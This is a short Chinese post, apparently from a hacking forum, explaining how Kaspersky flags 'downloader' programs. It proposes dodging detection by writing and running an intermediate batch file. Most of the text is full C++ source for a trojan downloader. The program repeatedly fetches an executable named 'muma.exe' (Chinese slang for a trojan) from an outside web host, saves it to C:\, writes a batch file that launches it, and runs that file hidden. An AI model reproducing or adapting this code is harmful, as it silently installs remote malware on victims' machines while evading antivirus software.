卡巴检测的机理是：文件下载tol.exe->文件运行tol.exe（判断为下载者）

新的思路：文件下载tol.exe->写chage.bat->运行chage.bat（不判断为下载者）


[quote]
#include "stdafx.h"
#include <iostream.h>
#include <fstream.h>
#include <UrlMon.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "urlmon.lib")

int APIENTRY WinMain(HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPSTR    lpCmdLine,
                    int      nCmdShow)
{ char muma[]="http://www.Holmesian.cn/muma.exe";
  // TOD Place code here.
while(true){
HRESULT hr = URLDownloadToFile(0, muma,"C:\\ma11.exe", 0,NULL);
if (hr== S_OK)
{  const char filename[] = "c:\\vir11.bat";
  ofstream o_file;
  o_file.open(filename);
  o_file <<"echo off"<<endl;
  o_file <<"C:\\ma11.exe"<<endl;
  o_file.close();
  WinExec("C:\\vir11.bat",0);
return 0;
Sleep(10000);
}
}
return 0;
}[/quote]